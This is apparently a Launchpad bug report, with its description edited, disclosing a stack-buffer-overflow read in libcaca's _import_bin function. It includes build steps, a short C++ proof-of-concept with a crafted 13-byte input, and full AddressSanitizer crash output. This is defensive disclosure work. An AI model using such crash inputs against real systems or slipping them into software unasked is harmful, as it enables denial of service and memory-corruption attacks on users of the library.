** Description changed:

  Hello ubuntu security team
+ 
+ issues:https://github.com/cacalabs/libcaca/issues/56
+ 
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
+ 
  
  libcaca version e4968ba
  
  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <assert.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <fstream>
  #include <iostream>
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"bin");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"bin");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
  int main(int args,char* argv[]){
-         size_t  len = 0;
-         unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
-         len = sizeof(buffer)/sizeof(unsigned char);
-         printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
-         crash((const uint8_t*)buffer,len);
-         return 0;
+         size_t  len = 0;
+         unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
+         len = sizeof(buffer)/sizeof(unsigned char);
+         printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+         crash((const uint8_t*)buffer,len);
+         return 0;
  
  }
  4.compile poc_bin.cc
  
  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
  5.Run poc_bin
  asan info:
  
  =================================================================
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
-     #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
-     #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
-     #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
-     #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
-     #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
+     #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
+     #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+     #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+     #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+     #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
  
  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
-     #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+     #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
-     [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
+   This frame has 1 object(s):
+     [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-       (longjmp and C++ exceptions *are* supported)
+       (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
-   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
-   0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
-   Addressable:           00
-   Partially addressable: 01 02 03 04 05 06 07 
-   Heap left redzone:       fa
-   Freed heap region:       fd
-   Stack left redzone:      f1
-   Stack mid redzone:       f2
-   Stack right redzone:     f3
-   Stack after return:      f5
-   Stack use after scope:   f8
-   Global redzone:          f9
-   Global init order:       f6
-   Poisoned by user:        f7
-   Container overflow:      fc
-   Array cookie:            ac
-   Intra object redzone:    bb
-   ASan internal:           fe
-   Left alloca redzone:     ca
-   Right alloca redzone:    cb
-   Shadow gap:              cc
+   Addressable:           00
+   Partially addressable: 01 02 03 04 05 06 07
+   Heap left redzone:       fa
+   Freed heap region:       fd
+   Stack left redzone:      f1
+   Stack mid redzone:       f2
+   Stack right redzone:     f3
+   Stack after return:      f5
+   Stack use after scope:   f8
+   Global redzone:          f9
+   Global init order:       f6
+   Poisoned by user:        f7
+   Container overflow:      fc
+   Array cookie:            ac
+   Intra object redzone:    bb
+   ASan internal:           fe
+   Left alloca redzone:     ca
+   Right alloca redzone:    cb
+   Shadow gap:              cc
  ==3817476==ABORTING
  
  Thanks

https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin
